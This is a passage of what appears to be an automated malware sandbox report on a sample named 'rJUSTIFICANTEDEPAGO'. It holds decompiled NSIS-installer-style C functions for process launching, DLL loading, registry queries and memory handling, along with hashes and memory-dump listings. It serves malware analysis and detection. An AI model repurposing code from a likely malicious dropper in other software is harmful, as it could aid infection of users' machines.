                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID: Call
                                        • API String ID: 3356406503-1824292864
                                        • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                        • Instruction ID: 844fa4e459781eb8e351c6656b051d01f86af1f9d8b6039d3a5e8c643dc5dfc4
                                        • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                        • Instruction Fuzzy Hash: E1015A72500209EAEF218F51CD0AEDB3BA8EF54360F01803AF91AA6191D778D964CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E00405844(WCHAR* _a4) {
                                        				struct _PROCESS_INFORMATION _v20;
                                        				int _t7;
                                        
                                        				0x7a4f28->cb = 0x44;
                                        				_t7 = CreateProcessW(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x7a4f28,  &_v20); // executed
                                        				if(_t7 != 0) {
                                        					CloseHandle(_v20.hThread);
                                        					return _v20.hProcess;
                                        				}
                                        				return _t7;
                                        			}





                                        0x0040584d
                                        0x0040586d
                                        0x00405875
                                        0x0040587a
                                        0x00000000
                                        0x00405880
                                        0x00405884

                                        APIs
                                        • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,007A4F28,Error launching installer), ref: 0040586D
                                        • CloseHandle.KERNEL32(?), ref: 0040587A
                                        Strings
                                        • Error launching installer, xrefs: 00405857
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CloseCreateHandleProcess
                                        • String ID: Error launching installer
                                        • API String ID: 3712363035-66219284
                                        • Opcode ID: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                        • Instruction ID: aeed2aac7dae16331184000a6a76f50175ec0d5b09d6907c0601aa480b830b3a
                                        • Opcode Fuzzy Hash: c1804180a416b962a28ecbb96a8e49de5f878aa0b2aa8e9b50c45ca8c4f376c1
                                        • Instruction Fuzzy Hash: A0E0BFF5500209BFEB009F64ED05E7B76ACEB54645F018525BD50F2190D67999148A78
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E0040202C(void* __ebx, void* __eflags) {
                                        				struct HINSTANCE__* _t23;
                                        				struct HINSTANCE__* _t31;
                                        				void* _t32;
                                        				void* _t34;
                                        				WCHAR* _t37;
                                        				intOrPtr* _t38;
                                        				void* _t39;
                                        
                                        				_t32 = __ebx;
                                        				asm("sbb eax, 0x7a8af8");
                                        				 *(_t39 - 4) = 1;
                                        				if(__eflags < 0) {
                                        					_push(0xffffffe7);
                                        					L15:
                                        					E00401423();
                                        					L16:
                                        					 *0x7a8ac8 =  *0x7a8ac8 +  *(_t39 - 4);
                                        					return 0;
                                        				}
                                        				_t37 = E00402C37(0xfffffff0);
                                        				 *((intOrPtr*)(_t39 - 0x3c)) = E00402C37("true");
                                        				if( *((intOrPtr*)(_t39 - 0x18)) == __ebx) {
                                        					L3:
                                        					_t23 = LoadLibraryExW(_t37, _t32, 8); // executed
                                        					 *(_t39 + 8) = _t23;
                                        					if(_t23 == _t32) {
                                        						_push(0xfffffff6);
                                        						goto L15;
                                        					}
                                        					L4:
                                        					_t38 = E004066A8( *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x3c)));
                                        					if(_t38 == _t32) {
                                        						E004052C3(0xfffffff7,  *((intOrPtr*)(_t39 - 0x3c)));
                                        					} else {
                                        						 *(_t39 - 4) = _t32;
                                        						if( *((intOrPtr*)(_t39 - 0x20)) == _t32) {
                                        							 *_t38( *((intOrPtr*)(_t39 - 8)), 0x400, _t34, 0x40cdac, 0x40a000); // executed
                                        						} else {
                                        							E00401423( *((intOrPtr*)(_t39 - 0x20)));
                                        							if( *_t38() != 0) {
                                        								 *(_t39 - 4) = 1;
                                        							}
                                        						}
                                        					}
                                        					if( *((intOrPtr*)(_t39 - 0x1c)) == _t32 && E0040390D( *(_t39 + 8)) != 0) {
                                        						FreeLibrary( *(_t39 + 8)); // executed
                                        					}
                                        					goto L16;
                                        				}
                                        				_t31 = GetModuleHandleW(_t37); // executed
                                        				 *(_t39 + 8) = _t31;
                                        				if(_t31 != __ebx) {
                                        					goto L4;
                                        				}
                                        				goto L3;
                                        			}










                                        0x0040202c
                                        0x0040202c
                                        0x00402031
                                        0x00402038
                                        0x004020f7
                                        0x00402245
                                        0x00402245
                                        0x00402abf
                                        0x00402ac2
                                        0x00402ace
                                        0x00402ace
                                        0x00402047
                                        0x00402051
                                        0x00402054
                                        0x00402064
                                        0x00402068
                                        0x00402070
                                        0x00402073
                                        0x004020f0
                                        0x00000000
                                        0x004020f0
                                        0x00402075
                                        0x00402080
                                        0x00402084
                                        0x004020c4
                                        0x00402086
                                        0x00402089
                                        0x0040208c
                                        0x004020b8
                                        0x0040208e
                                        0x00402091
                                        0x0040209a
                                        0x0040209c
                                        0x0040209c
                                        0x0040209a
                                        0x0040208c
                                        0x004020cc
                                        0x004020e5
                                        0x004020e5
                                        0x00000000
                                        0x004020cc
                                        0x00402057
                                        0x0040205f
                                        0x00402062
                                        0x00000000
                                        0x00000000
                                        0x00000000

                                        APIs
                                        • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402057
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000,?), ref: 004052FB
                                          • Part of subcall function 004052C3: lstrlenW.KERNEL32(0040323B,007A0F00,00000000,007924D8,765823A0,?,?,?,?,?,?,?,?,?,0040323B,00000000), ref: 0040530B
                                          • Part of subcall function 004052C3: lstrcatW.KERNEL32(007A0F00,0040323B), ref: 0040531E
                                          • Part of subcall function 004052C3: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 00405330
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405356
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405370
                                          • Part of subcall function 004052C3: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040537E
                                        • LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00402068
                                        • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020E5
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                        • String ID:
                                        • API String ID: 334405425-0
                                        • Opcode ID: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
                                        • Instruction ID: 33d9dd4ae41202a81bff1c9b27653e69474f3e4813fbbe5d8a50aab7b73a9ae0
                                        • Opcode Fuzzy Hash: 7ec08670c164e3e4a84eae5e80db5c7481304a47723853e255a05842b85f3cdd
                                        • Instruction Fuzzy Hash: 1E21B371900208AACF20AFA5CE4CA9E7970AF05354F64813BF511B11E1DBBD4951DA5E
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E00401B71(void* __ebx) {
                                        				intOrPtr _t8;
                                        				void* _t9;
                                        				void _t12;
                                        				void* _t14;
                                        				void* _t22;
                                        				void* _t25;
                                        				void* _t30;
                                        				void* _t33;
                                        				void* _t34;
                                        				char* _t36;
                                        				void* _t37;
                                        
                                        				_t28 = __ebx;
                                        				_t8 =  *((intOrPtr*)(_t37 - 0x20));
                                        				_t30 =  *0x40cdac; // 0x8a4758
                                        				if(_t8 == __ebx) {
                                        					if( *((intOrPtr*)(_t37 - 0x24)) == __ebx) {
                                        						_t9 = GlobalAlloc(0x40, 0x804); // executed
                                        						_t34 = _t9;
                                        						_t5 = _t34 + 4; // 0x4
                                        						E00406281(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x28)));
                                        						_t12 =  *0x40cdac; // 0x8a4758
                                        						 *_t34 = _t12;
                                        						 *0x40cdac = _t34;
                                        					} else {
                                        						if(_t30 == __ebx) {
                                        							 *((intOrPtr*)(_t37 - 4)) = 1;
                                        						} else {
                                        							_t3 = _t30 + 4; // 0x8a475c
                                        							E0040625F(_t33, _t3);
                                        							_push(_t30);
                                        							 *0x40cdac =  *_t30;
                                        							GlobalFree();
                                        						}
                                        					}
                                        					goto L15;
                                        				} else {
                                        					while(1) {
                                        						_t8 = _t8 - 1;
                                        						if(_t30 == _t28) {
                                        							break;
                                        						}
                                        						_t30 =  *_t30;
                                        						if(_t8 != _t28) {
                                        							continue;
                                        						} else {
                                        							if(_t30 == _t28) {
                                        								break;
                                        							} else {
                                        								_t32 = _t30 + 4;
                                        								_t36 = L"Call";
                                        								E0040625F(_t36, _t30 + 4);
                                        								_t22 =  *0x40cdac; // 0x8a4758
                                        								E0040625F(_t32, _t22 + 4);
                                        								_t25 =  *0x40cdac; // 0x8a4758
                                        								_push(_t36);
                                        								_push(_t25 + 4);
                                        								E0040625F();
                                        								L15:
                                        								 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t37 - 4));
                                        								_t14 = 0;
                                        							}
                                        						}
                                        						goto L17;
                                        					}
                                        					_push(0x200010);
                                        					_push(E00406281(_t28, _t30, _t33, _t28, 0xffffffe8));
                                        					E004058C1();
                                        					_t14 = 0x7fffffff;
                                        				}
                                        				L17:
                                        				return _t14;
                                        			}














                                        0x00401b71
                                        0x00401b71
                                        0x00401b74
                                        0x00401b7c
                                        0x00401bc5
                                        0x00401bf3
                                        0x00401bfc
                                        0x00401bfe
                                        0x00401c02
                                        0x00401c07
                                        0x00401c0c
                                        0x00401c0e
                                        0x00401bc7
                                        0x00401bc9
                                        0x00402885
                                        0x00401bcf
                                        0x00401bcf
                                        0x00401bd4
                                        0x00401bdb
                                        0x00401bdc
                                        0x00401be1
                                        0x00401be1
                                        0x00401bc9
                                        0x00000000
                                        0x00401b7e
                                        0x00401b7e
                                        0x00401b7e
                                        0x00401b81
                                        0x00000000
                                        0x00000000
                                        0x00401b87
                                        0x00401b8b
                                        0x00000000
                                        0x00401b8d
                                        0x00401b8f
                                        0x00000000
                                        0x00401b95
                                        0x00401b95
                                        0x00401b98
                                        0x00401b9f
                                        0x00401ba4
                                        0x00401bae
                                        0x00401bb3
                                        0x00401bb8
                                        0x00401bbc
                                        0x004029db
                                        0x00402abf
                                        0x00402ac2
                                        0x00402ac8
                                        0x00402ac8
                                        0x00401b8f
                                        0x00000000
                                        0x00401b8b
                                        0x004022de
                                        0x004022eb
                                        0x004022ec
                                        0x004022f1
                                        0x004022f1
                                        0x00402aca
                                        0x00402ace

                                        APIs
                                        • GlobalFree.KERNEL32(008A4758), ref: 00401BE1
                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BF3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Global$AllocFree
                                        • String ID: Call
                                        • API String ID: 3394109436-1824292864
                                        • Opcode ID: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
                                        • Instruction ID: ff4179f111cc43373cd76ec1a10ab0793b80b0baf7d628909b63b00cde6b52bc
                                        • Opcode Fuzzy Hash: 1bbcc836f2a4653b13522cd00a863f9842cd1eaa2e08dbca4416ed67f050c7c0
                                        • Instruction Fuzzy Hash: 5521AC72600100EFDB60FB94CE8895A76BAAF94328725413BF502F72D2DA7C98518F1D
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 86%
                                        			E004024F2(int* __ebx, intOrPtr __edx, short* __esi) {
                                        				void* _t9;
                                        				int _t10;
                                        				long _t13;
                                        				int* _t16;
                                        				intOrPtr _t21;
                                        				void* _t22;
                                        				short* _t24;
                                        				void* _t26;
                                        				void* _t29;
                                        
                                        				_t24 = __esi;
                                        				_t21 = __edx;
                                        				_t16 = __ebx;
                                        				_t9 = E00402C77(_t29, 0x20019); // executed
                                        				_t22 = _t9;
                                        				_t10 = E00402C15(3);
                                        				 *((intOrPtr*)(_t26 - 0x4c)) = _t21;
                                        				 *__esi = __ebx;
                                        				if(_t22 == __ebx) {
                                        					 *((intOrPtr*)(_t26 - 4)) = 1;
                                        				} else {
                                        					 *(_t26 + 8) = 0x3ff;
                                        					if( *((intOrPtr*)(_t26 - 0x18)) == __ebx) {
                                        						_t13 = RegEnumValueW(_t22, _t10, __esi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                        						__eflags = _t13;
                                        						if(_t13 != 0) {
                                        							 *((intOrPtr*)(_t26 - 4)) = 1;
                                        						}
                                        					} else {
                                        						RegEnumKeyW(_t22, _t10, __esi, 0x3ff);
                                        					}
                                        					_t24[0x3ff] = _t16;
                                        					_push(_t22); // executed
                                        					RegCloseKey(); // executed
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t26 - 4));
                                        				return 0;
                                        			}












                                        0x004024f2
                                        0x004024f2
                                        0x004024f2
                                        0x004024f7
                                        0x004024fe
                                        0x00402500
                                        0x00402508
                                        0x0040250b
                                        0x0040250e
                                        0x00402885
                                        0x00402514
                                        0x0040251c
                                        0x0040251f
                                        0x00402538
                                        0x0040253e
                                        0x00402540
                                        0x00402542
                                        0x00402542
                                        0x00402521
                                        0x00402525
                                        0x00402525
                                        0x00402549
                                        0x00402550
                                        0x00402551
                                        0x00402551
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402525
                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00020019), ref: 00402538
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: Enum$CloseValue
                                        • String ID:
                                        • API String ID: 397863658-0
                                        • Opcode ID: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
                                        • Instruction ID: 18a2236d2da02041d188dcbd2d72052a2a953223b30961087eade96b9ec92dd4
                                        • Opcode Fuzzy Hash: 42400e7620033b3c75d1a052fef88eb2105eaffe06110ad1b7b23095d5839a67
                                        • Instruction Fuzzy Hash: 90017171904104AFE7159FA5DE89ABFB6B8EF45348F10403EF105A62D0DAB84E449B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        APIs
                                        • CreateFileA.KERNELBASE(00000000), ref: 1000295B
                                        • GetLastError.KERNEL32 ref: 10002A62
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2886044792.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                        • Associated: 00000002.00000002.2886017389.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886076658.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000002.00000002.2886121541.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_10000000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CreateErrorFileLast
                                        • String ID:
                                        • API String ID: 1214770103-0
                                        • Opcode ID: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                        • Instruction ID: 6dfa44c8e371a7ac1a486a55eff0af4ad814c9ea0d06d7514663fdd8c294557a
                                        • Opcode Fuzzy Hash: 34874d5dbfeecf70d049f007544d8fe97316615c6b6b2225bbceacac8e3d04ae
                                        • Instruction Fuzzy Hash: 4E51B4B9905211DFFB20DFA4DCC675937A8EB443D4F22C42AEA04E726DCE34A990CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 84%
                                        			E0040247E(int* __ebx, char* __esi) {
                                        				void* _t17;
                                        				short* _t18;
                                        				long _t21;
                                        				void* _t33;
                                        				void* _t37;
                                        				void* _t40;
                                        
                                        				_t35 = __esi;
                                        				_t27 = __ebx;
                                        				_t17 = E00402C77(_t40, 0x20019); // executed
                                        				_t33 = _t17;
                                        				_t18 = E00402C37(0x33);
                                        				 *__esi = __ebx;
                                        				if(_t33 == __ebx) {
                                        					 *(_t37 - 4) = 1;
                                        				} else {
                                        					 *(_t37 - 0x4c) = 0x800;
                                        					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x4c); // executed
                                        					if(_t21 != 0) {
                                        						L7:
                                        						 *_t35 = _t27;
                                        						 *(_t37 - 4) = 1;
                                        					} else {
                                        						if( *(_t37 + 8) == 4) {
                                        							__eflags =  *(_t37 - 0x18) - __ebx;
                                        							 *(_t37 - 4) = 0 |  *(_t37 - 0x18) == __ebx;
                                        							E004061A6(__esi,  *__esi);
                                        						} else {
                                        							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                        								 *(_t37 - 4) =  *(_t37 - 0x18);
                                        								_t35[0x7fe] = _t27;
                                        							} else {
                                        								goto L7;
                                        							}
                                        						}
                                        					}
                                        					_push(_t33); // executed
                                        					RegCloseKey(); // executed
                                        				}
                                        				 *0x7a8ac8 =  *0x7a8ac8 +  *(_t37 - 4);
                                        				return 0;
                                        			}









                                        0x0040247e
                                        0x0040247e
                                        0x00402483
                                        0x0040248a
                                        0x0040248c
                                        0x00402493
                                        0x00402496
                                        0x00402885
                                        0x0040249c
                                        0x0040249f
                                        0x004024af
                                        0x004024ba
                                        0x004024ea
                                        0x004024ea
                                        0x004024ed
                                        0x004024bc
                                        0x004024c0
                                        0x004024d9
                                        0x004024e0
                                        0x004024e3
                                        0x004024c2
                                        0x004024c5
                                        0x004024d0
                                        0x00402549
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x004024c5
                                        0x004024c0
                                        0x00402550
                                        0x00402551
                                        0x00402551
                                        0x00402ac2
                                        0x00402ace

                                        APIs
                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024AF
                                        • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsz62F8.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402551
                                        Memory Dump Source
                                        • Source File: 00000002.00000002.2800944994.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000002.00000002.2800912798.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801007500.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2801043131.00000000007CE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        • Associated: 00000002.00000002.2802534254.00000000007EF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_2_2_400000_rJUSTIFICANTEDEPAGO.jbxd
                                        Similarity
                                        • API ID: CloseQueryValue
                                        • String ID:
                                        • API String ID: 3356406503-0
                                        • Opcode ID: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
                                        • Instruction ID: 12a56d39eb772e04bf5da2f774c5f61affeaaf74f2150d0b0e53692ad729b11e
                                        • Opcode Fuzzy Hash: 08f873b6c5f836ea2cbeb832c07c557579df9b46a08ed6a66d2a9d9fb826c037
                                        • Instruction Fuzzy Hash: 0C117371914209EFEF24DFA4CA595BEB6B4EF05344F20843FE046A72C0D7B84A45DB5A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 69%
                                        			E00401389(signed int _a4) {
                                        				intOrPtr* _t6;
                                        				void* _t8;
                                        				void* _t10;
                                        				signed int _t11;
                                        				void* _t12;
                                        				signed int _t16;
                                        				signed int _t17;
                                        				void* _t18;
                                        
                                        				_t17 = _a4;
                                        				while(_t17 >= 0) {
